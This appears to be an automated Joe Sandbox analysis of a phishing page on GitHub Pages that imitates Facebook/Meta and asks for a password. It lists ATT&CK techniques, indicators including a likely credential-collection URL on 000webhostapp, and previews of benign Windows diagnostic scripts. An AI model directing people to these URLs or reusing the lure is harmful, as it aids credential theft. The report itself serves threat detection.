Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	12 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
http://remove-restriction.github.io/input-pass	100%	Avira URL Cloud	phishing

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\DiagPackage.dll	0%	ReversingLabs
C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\NetworkDiagnosticSnapIn.dll	0%	ReversingLabs
C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\en-GB\DiagPackage.dll.mui	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://remove-restriction.github.io/input-pass	100%	Avira URL Cloud	phishing
https://remove-restriction.github.io/input-pass/style.css	100%	Avira URL Cloud	phishing
https://remove-restriction.github.io/input-pass/favicon.ico	100%	Avira URL Cloud	phishing
https://practiced-dockings.000webhostapp.com/new/add.php	0%	Avira URL Cloud	safe
https://remove-restriction.github.io/input-pass/interview.css	100%	Avira URL Cloud	phishing

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
star-mini.c10r.facebook.com	157.240.0.35	true	false		high
google.com	172.217.16.206	true	false		high
www.google.com	216.58.206.68	true	false		high
remove-restriction.github.io	185.199.108.153	true	true		unknown
www.facebook.com	unknown	unknown	false		high
practiced-dockings.000webhostapp.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://remove-restriction.github.io/input-pass/interview.css	true	Avira URL Cloud: phishing	unknown
https://www.facebook.com/images/fb_icon_325x325.png	false		high
https://remove-restriction.github.io/input-pass	false	Avira URL Cloud: phishing	unknown
https://remove-restriction.github.io/input-pass/	true		unknown
https://remove-restriction.github.io/input-pass/favicon.ico	true	Avira URL Cloud: phishing	unknown
http://remove-restriction.github.io/input-pass	true		unknown
https://remove-restriction.github.io/input-pass/style.css	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico	chromecache_64.2.dr	false		high
https://practiced-dockings.000webhostapp.com/new/add.php	chromecache_64.2.dr	false	Avira URL Cloud: safe	unknown
https://twitter.com/githubstatus	chromecache_63.2.dr	false		high
https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xgVgalBG80z.png);height:24px;width:24px	chromecache_62.2.dr	false		high
https://githubstatus.com	chromecache_63.2.dr	false		high
https://help.github.com/pages/	chromecache_63.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
157.240.0.35	star-mini.c10r.facebook.com	United States		32934	FACEBOOKUS	false
216.58.206.68	www.google.com	United States		15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
185.199.108.153	remove-restriction.github.io	Netherlands		54113	FASTLYUS	true
157.240.253.35	unknown	United States		32934	FACEBOOKUS	false

Private

IP
192.168.2.4
192.168.2.5

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1607942
Start date and time:	2025-02-06 01:41:02 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://remove-restriction.github.io/input-pass
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.phis.evad.win@22/28@26/7
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.67, 216.58.206.46, 108.177.15.84, 216.58.206.78, 142.250.186.46, 172.217.18.106, 142.250.184.234, 216.58.206.42, 142.250.185.202, 142.250.185.106, 216.58.206.74, 172.217.23.106, 172.217.16.138, 142.250.185.234, 142.250.185.74, 142.250.185.170, 142.250.186.170, 172.217.18.10, 216.58.212.138, 142.250.185.138, 142.250.184.202, 217.20.57.19, 2.23.77.188, 142.250.185.78, 142.250.184.238, 172.217.16.206, 172.217.18.14, 142.250.186.174, 142.250.181.227, 142.250.186.78, 184.28.90.27, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://remove-restriction.github.io/input-pass

Simulations

Behavior and APIs

⊘No simulations

LLM Input / Output

Input	Output
URL: http://remove-restriction.github.io Model: Joe Sandbox AI	```json{ "brand": "GitHub", "brand_classification": "wellknown", "legit_url": "https://github.com", "similarity": 3, "spoofed": 2, "reasoning": "The URL 'remove-restriction.github.io' uses the 'github.io' domain, which is a legitimate domain for GitHub Pages, a service provided by GitHub for hosting static websites. The subdomain 'remove-restriction' does not closely resemble 'github.com' or any known GitHub subdomains, and it suggests a different purpose, possibly related to a project or service hosted on GitHub Pages. There are no visual character substitutions or structural changes that mimic the main GitHub domain. The use of 'github.io' is legitimate and common for personal or project pages, reducing the likelihood of this being a typosquatting attempt."}
URL: http://remove-restriction.github.io
URL: https://remove-restriction.github.io Model: Joe Sandbox AI	```json{ "brand": "unknown", "brand_classification": "unknown", "legit_url": "unknown", "similarity": 0, "spoofed": 0, "reasoning": "The URL 'https://remove-restriction.github.io' does not appear to be targeting any specific brand. The domain 'github.io' is a legitimate domain used for hosting static websites via GitHub Pages, which is a service provided by GitHub. The subdomain 'remove-restriction' does not closely resemble any known brand or legitimate URL. There are no visual character substitutions or structural changes that suggest typosquatting. The context of the URL suggests it could be a personal or project page hosted on GitHub, which is a common and legitimate use of the 'github.io' domain."}
URL: https://remove-restriction.github.io
URL: https://remove-restriction.github.io/input-pass/ Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "Submit", "text_input_field_labels": [ "Password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" } Google indexed: False

URL: https://remove-restriction.github.io/input-pass/ Model: Joe Sandbox AI	{ "brands": [ "Meta", "Facebook" ] } Google indexed: False
	{ "brands": [ "Meta", "Facebook" ] } Google indexed: False
URL: https://remove-restriction.github.io/input-pass/ Model: Joe Sandbox AI	```json{ "legit_domain": "meta.com", "classification": "wellknown", "reasons": [ "The brand 'Meta' is well-known and is associated with the legitimate domain 'meta.com'.", "The URL 'remove-restriction.github.io' does not match the legitimate domain for Meta.", "The use of 'github.io' suggests a GitHub Pages site, which is often used for personal or project pages, not official brand sites.", "The presence of 'remove-restriction' in the URL is suspicious and not related to Meta's official services.", "The input field for 'Password' on a non-official domain is a common phishing tactic to capture sensitive information." ], "riskscore": 9} Google indexed: False
URL: remove-restriction.github.io Brands: Meta Input Fields: Password

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\DiagPackage.diagpkg

Process:	C:\Windows\System32\msdt.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (317), with CRLF line terminators
Category:	dropped
Size (bytes):	167016
Entropy (8bit):	4.413051981071322
Encrypted:	false
SSDEEP:	384:X+BeLgtgFgQg7rgZgp3vFD2smEtttbkcL5Of8hj1fVh1f8hWqEfVhnq2fVhMfxhd:XLgtgFgQg7rgZgplP/s
MD5:	0606098A37089BDC9D644DEE1CC1CD78
SHA1:	CADAE9623A27BD22771BAB9D26B97226E8F2318B
SHA-256:	284A7A8525B1777BDBC194FA38D28CD9EE91C2CBC7856F5968E79667C6B62A9D
SHA-512:	0711E2FEF9FDE17B87F3F6AF1442BD46B4C86BB61C8519548B89C7A61DFCF734196DDF2D90E586D486A3B33F672A99379E8205C240BD4BCB23625FFB22936443
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?><dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007" xmlns:wdem="http://diagnostics.microsoft.com/2007/08/WindowsDiagnosticExtendedMetadata">.. <DiagnosticIdentification>.. <ID>NetworkDiagnostics</ID>.. <Version>4.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>http://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>1.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteracti

C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\DiagPackage.dll

Process:	C:\Windows\System32\msdt.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	489984
Entropy (8bit):	7.291387835559217
Encrypted:	false
SSDEEP:	6144:LZC0lEOC2Us6eEyAc0jbJYOjlCLHUZQsxjuaJ7oSEvcdfSc0jbJYOjlCLHUZQ:LZFLUe6vJ/wLIvavyfEvJ/wLI
MD5:	EF3F72E162CFA6C082007672655CAE8A
SHA1:	F6BE37340CDED395EF7C3DAB103DE4E061B05806
SHA-256:	5A04D9F78BEF844FEE2FEC65610E12DB59CEFAA63544F3045401597AAE753B3C
SHA-512:	B63D884525CC747D4DEB1335BF31A27248DD612BE9D8A1F6CA7C5F5A795964AC3B8868994CDE1EC5CD0F4C537E00EC56FB45D5250F3BEC1BFA13EE4AA1F9C52C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d....F..........." .........x....................................................../.....`A......................................................... ...u..............................T............................................................................rdata..............................@..@.rsrc....u... ...v..................@..@.....F.........T...T...T........F.........$................F.............................T....rdata..T...\|....rdata$zzzdbg.... .......rsrc$01.....0...e...rsrc$02.... ....,.J..o...m.W{F..,.0H...m.S..F.............................................................................................................................................................................................................................................................................................

C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\HTInteractiveRes.ps1

Process:	C:\Windows\System32\msdt.exe
File Type:	C source, ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	951
Entropy (8bit):	5.0857751193503695
Encrypted:	false
SSDEEP:	24:Qb3DQ7NOepjIAflbfjbgTRmW26S1pGCXGiVd/ZF2GRaesBFw:mDzepZtjBtRRbCUae2q
MD5:	C25ED2111C6EE9299E6D9BF51012F2F5
SHA1:	2DEFBB5A2758AF744E3DD8AF3A4AA153A28E4713
SHA-256:	8E326EE0475208D4C943D885035058FAD7146BBA02B66305F7C9F31F6A57E81B
SHA-512:	AAC97463868162FE042748A279C38F6FB569E971E0CC0339D1A8969A7F5633EF7377B6F7DCFAE94BDD2BF96BBFF454B607EE8D7573E1C3C9569269FE82671D9E
Malicious:	false
Reputation:	low
Preview:	# Copyright . 2008, Microsoft Corporation. All rights reserved.....PARAM($RepairName, $RepairText, $HelpTopicLink, $HelpTopicLinkText, $FailResolution)..#Non NDF Help Topic Resolution (defined non-manual so we don't need to prompt the user to see the repair)....#include utility functions... .\UtilityFunctions.ps1..Import-LocalizedData -BindingVariable localizationString -FileName LocalizationData....#the strings come in as raw resource strings, load the actual strings..$repairNameStr = LoadResourceString $RepairName;..$repairTextStr = LoadResourceString $RepairText;..$helpTopicLinkTextStr = LoadResourceString $HelpTopicLinkText....#display the help topic interaction..Get-DiagInput -ID "IT_HelpTopicRepair" -Parameter @{"IT_P_Name"=$repairNameStr; "IT_P_Description"=$repairTextStr; "IT_P_HelpTopicText" = $helpTopicLinkTextStr; "IT_P_HelpTopicLink" = $HelpTopicLink;}....if($FailResolution -eq "TRUE")..{.. throw "Issue not resolved."..}..

C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\InteractiveRes.ps1

Process:	C:\Windows\System32\msdt.exe
File Type:	C source, ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	770
Entropy (8bit):	5.043368661106705
Encrypted:	false
SSDEEP:	24:Qb3DQ7NcIKGlbfjbgTRmW26S1pGK/KrGFxw:mDl4jBtPKH
MD5:	25B8543DBF571F040118423BC3C7A75E
SHA1:	49044724698E6964DC93ACF5BEE2A77B8EAD4133
SHA-256:	D78E6291D6F27AC6FEBDCF0A4D5A34521E7F033AF8875E026DF21BA7513AB64A
SHA-512:	EC991FF552C1012209940CDCB081D64876B7989C56F07739B392DAAE9BCABA883B45AA90D50BEF31F276A9CD8492EE2B9DB700CD5E20E7B17BA43D98EC394DF5
Malicious:	false
Reputation:	low
Preview:	# Copyright . 2008, Microsoft Corporation. All rights reserved.....PARAM($RepairName, $RepairText, $FailResolution)..#Non NDF Informational Resolution (defined non-manual so we don't need to prompt the user to see the repair)....#include utility functions... .\UtilityFunctions.ps1..Import-LocalizedData -BindingVariable localizationString -FileName LocalizationData....#the strings come in as raw resource strings, load the actual strings..$repairNameStr = LoadResourceString $RepairName;..$repairTextStr = LoadResourceString $RepairText;....#display the help topic interaction..Get-DiagInput -ID "IT_InfoOnlyRepair" -Parameter @{"IT_P_Name"=$repairNameStr; "IT_P_Description"=$repairTextStr; }....if($FailResolution -eq "TRUE")..{.. throw "Issue not resolved."..}..

C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\NetworkDiagnosticSnapIn.dll

Process:	C:\Windows\System32\msdt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0031830583187595
Encrypted:	false
SSDEEP:	192:dXcso4xinzRCxtd3wz5AstHq9Y2f0mWjeLNW:dXckCMPGz9ZYWC5W
MD5:	502A165A5058F93FA7F84A9FB52887CD
SHA1:	43C723564649244A9FB28EDFEC83F0330420CEB1
SHA-256:	818DD25A449FEB9D30A108550940D3729FF1C83A8957049AA5E5EE56C89573DB
SHA-512:	A3B2B5A5D75DBBA17348FBECE170FB94E1406789724CC35FBDE36CAC55C58310F08E580E3FE5E9D7F306DE4FD579B69704CBD5B43D048CDA0B24CEED37770163
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>!............" ..0..............:... ...@....... ..............................D.....`..................................:..O....@..@....................`.......9..8............................................ ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`.......$..............@..B.................:......H........"..\|...................P9.......................................r...p.r3..p.rG..p..(......(........0..,..........@......(....&.s......@......(....&.o......(....V.(......(......(......{-..."..}-.....{...."..}.....0..........~.......~.....~.....s...... ..........(........,...s....z.....(........,...s....z..6M.....+;......(....(...............o........(....(....jX(.......X.....7..(.....(....&..*.0..F........o.....+ ..(......o.....{.....(....-.......(....-...

C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\NetworkDiagnosticsResolve.ps1

Process:	C:\Windows\System32\msdt.exe
File Type:	C source, ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	12213
Entropy (8bit):	4.649249749706581
Encrypted:	false
SSDEEP:	192:eLXYPXsa+OjfI9HIufxAey+3OG78/ce+eT5WjifrM+BK:VPXaifqdfxAey+ecmAu7k
MD5:	D213491A2D74B38A9535D616B9161217
SHA1:	BDE94742D1E769638E2DE84DFB099F797ADCC217
SHA-256:	4662C3C94E0340A243C2A39CA8A88FD9F65C74FB197644A11D4FFCAE6B191211
SHA-512:	5FD8B91B27935711495934E5D7CA14F9DD72BC40A38072595879EF334A47F99E0608087DDC62668C6F783938D9F22A3688C5CDEF3A9AD6C3575F3CFA5A3B0104
Malicious:	false
Reputation:	low
Preview:	# Copyright . 2008, Microsoft Corporation. All rights reserved.....PARAM($InstanceID, $RepairID, $RepairID1)....#include utility functions... .\UtilityFunctions.ps1..Import-LocalizedData -BindingVariable localizationString -FileName LocalizationData....<# function Pop-Msg {... param([string]$msg ="message",... [string]$ttl = "Title",... [int]$type = 64) ... $popwin = new-object -comobject wscript.shell... $null = $popwin.popup($msg,0,$ttl,$type)... remove-variable popwin..} #>......$script:ExpectingException = $false..$selectedRepair = $null..#pop-msg $InstanceID..#list of repairs to execute..if($InstanceID -eq $null)..{.. throw "No InstanceID specified"..}..else..{.. # if we re-ran diagnostics after validation failure and found the same issues we'll get the repair call to the original session.. # in these cases, we should use the new session instead to avoid unexpected behavior.. if($Global:ndfRerun -ne $null).. {.. "Replacing original incident " + $Global:ndf.I

C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\NetworkDiagnosticsTroubleshoot.ps1

Process:	C:\Windows\System32\msdt.exe
File Type:	C source, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25783
Entropy (8bit):	4.500605198321576
Encrypted:	false
SSDEEP:	384:blSoNnCiXTShob5bdVTz6rZTvxlBNexTKmh+xdxBUNQGJ:xSoTh8Jq
MD5:	2857343E8845EADB9B60CA0727CBDCB7
SHA1:	82A5533B3739504C72F9DCE7D353845B35037DEE
SHA-256:	06D927AE1DB217378EA77146FDCCA66D1F1F6D90780B734B8748D1052FBD8B86
SHA-512:	56B09BFBFF32B43DDD8E4636A485AF111B6DBFA2B7181299A22A3D007CF87DF0B09433100DC693C81C4F746A40F42FC51C75436511BE26270B8D84F7AC8EAD7D
Malicious:	false
Reputation:	low
Preview:	# Copyright (C) Microsoft Corporation. All rights reserved.....#include utility functions and localization data... .\UtilityFunctions.ps1..Import-LocalizedData -BindingVariable localizationString -FileName LocalizationData....#set the environment constants...\UtilitySetConstants....Write-DiagProgress -activity $localizationString.progress_Diagnosing_Initializing......#reset the global NDF object..$Global:ndf = $null..$Global:previousNdf = $null....#initialize script level variables (script scope used to avoid odd powershell scope handling)..$script:ExpectingException = $false..$script:incidentID = $null..$Global:incidentData = $null #need to access this during verification as well..$script:skipRerun = $false..$script:attachTraceFile = $false..$script:isRerun = $false....#first check whether we're either elevated or a re-run scenario..&{.. $prevIncidentID = 0.. $prevFlags = 0.... $script:ExpectingException = $true.. #marked as no-ui. throws exception if not available.. $S

C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\NetworkDiagnosticsVerify.ps1

Process:	C:\Windows\System32\msdt.exe
File Type:	C source, ISO-8859 text, with very long lines (307), with CRLF line terminators
Category:	dropped
Size (bytes):	11079
Entropy (8bit):	4.751587059666952
Encrypted:	false
SSDEEP:	192:YORm9mJWriv3iriv3oyriv3vgriv3qB3b8FnHayrBJckzrSartt0qF+rSG/rSurT:YORm9mJDv33v3oHv3lv3qB3b8FnHrrBA
MD5:	9B222D8EC4B20860F10EBF303035B984
SHA1:	B30EEA35C2516AFCAB2C49EF6531AF94EFAF7E1A
SHA-256:	A32E13DA40AC4B9E1DAC7DD28BC1D25E2F2136B61FF93BE943018B20796F15BC
SHA-512:	8331337CCB6E3137B01AEEC03E6921FD3B9E56C44FA1B17545AE5C7BFCDD39FCD8A90192884B3A82F56659009E24B63CE7F500E8766FD01E8D4E60A52DE0FE67
Malicious:	false
Reputation:	low
Preview:	# Copyright . 2008, Microsoft Corporation. All rights reserved.....PARAM($RootCauseID, $instanceID)....#include utility functions... .\UtilityFunctions.ps1..Import-LocalizedData -BindingVariable localizationString -FileName LocalizationData....#execute validation only once, and don't execute if repair skipped..$validationCalled = $false..if($Global:ValidateResult -eq $null -and ($Global:RepairSkipped -eq $false))..{.. $waitHandle = $Global:ndf.Validate($ValidateWaitTime);.. if($waitHandle -eq $null).. {.. throw "Validate call failed".. }.... WaitWithProgress $localizationString.progress_Vaildating_NoDetails $waitHandle $Global:ndf.. $Global:ValidateResult = $Global:ndf.ValidateResult.... #add the trace log to the session.. AddTraceFileToSession $Global:ndf $localizationString.TraceFileReportName "Verify".... $validationCalled = $true..}..else..{.. if(!$Global:ValidateResult -eq $null).. {.. "ID:" + $RootCauseID + " InstanceId:" + $instanc

C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\StartDPSService.ps1

Process:	C:\Windows\System32\msdt.exe
File Type:	C source, ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	567
Entropy (8bit):	4.837302167759307
Encrypted:	false
SSDEEP:	12:QcM3BFN+7bxAPe/LACrfgjvj5s8x8i9OoXdEgnc8x8i9OoXdQIx:Qb3DQ7FMejjbgTNhii9dXDxii9dXOe
MD5:	A660422059D953C6D681B53A6977100E
SHA1:	0C95DD05514D062354C0EECC9AE8D437123305BB
SHA-256:	D19677234127C38A52AEC23686775A8EB3F4E3A406F4A11804D97602D6C31813
SHA-512:	26F8CF9AC95FF649ECC2ED349BC6C7C3A04B188594D5C3289AF8F2768AB59672BC95FFEFCC83ED3FFA44EDD0AFEB16A4C2490E633A89FCE7965843674D94B523
Malicious:	false
Reputation:	low
Preview:	# Copyright . 2008, Microsoft Corporation. All rights reserved.....PARAM($SetAuto)....#include localization data..Import-LocalizedData -BindingVariable localizationString -FileName LocalizationData....if($SetAuto)..{.. #make DPS automatic.. Write-DiagProgress -activity $localizationString.progress_Repairing -status $localizationString.repair_SetAutoDPS.. set-service dps -StartupType Automatic..}....#start the DPS service..Write-DiagProgress -activity $localizationString.progress_Repairing -status $localizationString.repair_StartDPS..start-service dps..

C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\UtilityFunctions.ps1

Process:	C:\Windows\System32\msdt.exe
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	54687
Entropy (8bit):	4.91902609892868
Encrypted:	false
SSDEEP:	768:AaDgc60FE2UMeV6HQEqEVBWMBaRNdKdNh5BIW6Mk7svkxtFJuAQQW:j0a4bKcW6MkcSuj
MD5:	C912FAA190464CE7DEC867464C35A8DC
SHA1:	D1C6482DAD37720DB6BDC594C4757914D1B1DD70
SHA-256:	3891846307AA9E83BCA66B13198455AF72AF45BF721A2FBD41840D47E2A91201
SHA-512:	5C34352D36459FD8FCDA5B459A2E48601A033AF31D802A90ED82C443A5A346B9480880D30C64DB7AD0E4A8C35B98C98F69ECEEDAD72F2A70D9C6CCA74DCE826A
Malicious:	false
Reputation:	low
Preview:	# Copyright . 2008, Microsoft Corporation. All rights reserved.....function GetRuntimePath([string]$fileName = $(throw "No file name is specified"))..{.. if([string]::IsNullorEmpty($fileName)).. {.. throw "Invalid file name".. }.... [string]$runtimePath = [System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory().. return Join-Path $runtimePath $fileName..}....function RegSnapin([string]$dllName = $(throw "No dll is specified"))..{.. $dllPath = ".\" + $dllName.. Import-Module $dllPath..}....function UnregSnapin([string]$dllName = $(throw "No dll is specified"))..{ .. $moduleName = $dllName.TrimEnd(".dll").. Remove-Module $moduleName..}....function GetExistingNDFInstance($IncidentID)..{.. &{.. #if fails we start a new session.. $script:ExpectingException = $true.. $ndf = new-object -comObject ndfapi.NetworkDiagnostics.1 -strict.. $ndf.OpenExistingIncident($IncidentID); #throws exception if fails..

C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\UtilitySetConstants.ps1

Process:	C:\Windows\System32\msdt.exe
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3011
Entropy (8bit):	5.393839415081681
Encrypted:	false
SSDEEP:	48:mDqbURueqlXC2ay3g+rAgeNTFNe5L9tkYnNn2E8/UBUyuzoth1GlB:mD+UR6XC2az4MjY5L9VnNnIUBUyuzoti
MD5:	0C75AE5E75C3E181D13768909C8240BA
SHA1:	288403FC4BEDAACEBCCF4F74D3073F082EF70EB9
SHA-256:	DE5C231C645D3AE1E13694284997721509F5DE64EE5C96C966CDFDA9E294DB3F
SHA-512:	8FC944515F41A837C61A6C4E5181CA273607A89E48FBF86CF8EB8DB837AED095AA04FC3043029C3B5CB3710D59ABFD86F086AC198200F634BFB1A5DD0823406B
Malicious:	false
Reputation:	low
Preview:	# Copyright . 2008, Microsoft Corporation. All rights reserved.....function DefineConstant($curVal, $name, $value)..{.. if($curVal -eq $null).. {.. set-variable -name $name -value $value -option constant -scope Global.. }..}....DefineConstant $DiagnoseWaitTime "DiagnoseWaitTime" 90000..DefineConstant $RepairWaitTime "RepairWaitTime" 90000..DefineConstant $ValidateWaitTime "ValidateWaitTime" 90000..DefineConstant $ProgressUpdateDelay "ProgressUpdateDelay" 1000..DefineConstant $WinBuiltinAdministratorsSid "WinBuiltinAdministratorsSid" 26..DefineConstant $WinBuiltinNetworkConfigurationOperatorsSid "WinBuiltinNetworkConfigurationOperatorsSid" 37..DefineConstant $WinLocalLogonSid "WinLocalLogonSid" 80..DefineConstant $GuidLength "GuidLength" 38..DefineConstant $DefaultDiagURL "DefaultDiagURL" ""..DefineConstant $S_OK "S_OK" 0..DefineConstant $S_FALSE "S_FALSE" 1..DefineConstant $RF_USER_ACTION "RF_USER_ACTION" 0x10000000..DefineConstant $RF_INFORMATION_ONLY "RF_INFORMATION_O

C:\Windows\Temp\SDIAG_de393dd0-72da-475e-8a66-4aa6ac432fe2\en-GB\DiagPackage.dll.mui

Process:	C:\Windows\System32\msdt.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17408
Entropy (8bit):	3.463167967348922
Encrypted:	false
SSDEEP:	96:40OJmd+VoozojEIjPe/dQTVOd5hvhHyHMVqz+4MEvTLGlyQzwv7KCbVeog3+yt41:40njnexdUMR4wgK+gWlTWy
MD5:	42924954580FC0B97147D18CBD9064A2
SHA1:	E02B93D36214FB4A98AA9B4711920541C78D5B26
SHA-256:	B03FC44FCB28F039F94AC63B44617E04071D1DC5A5CD15E187AA806A085EF31A
SHA-512:	0B2737EE5C21538B120FD975850E7899F7F1B8B7FEC49B5E9F807EBFAE62DA3EB333CDBDB65912BACA43B39D63AFBE1258C8C54CC7E8A313D108339778585B73
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L..................!.........B...............................................`......W.....@.......................................... ...?..............................8............................................................................rdata..............................@..@.rsrc....@... ...@..................@..@.....\0.........T...8...8........\0.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%...:...rsrc$02.... 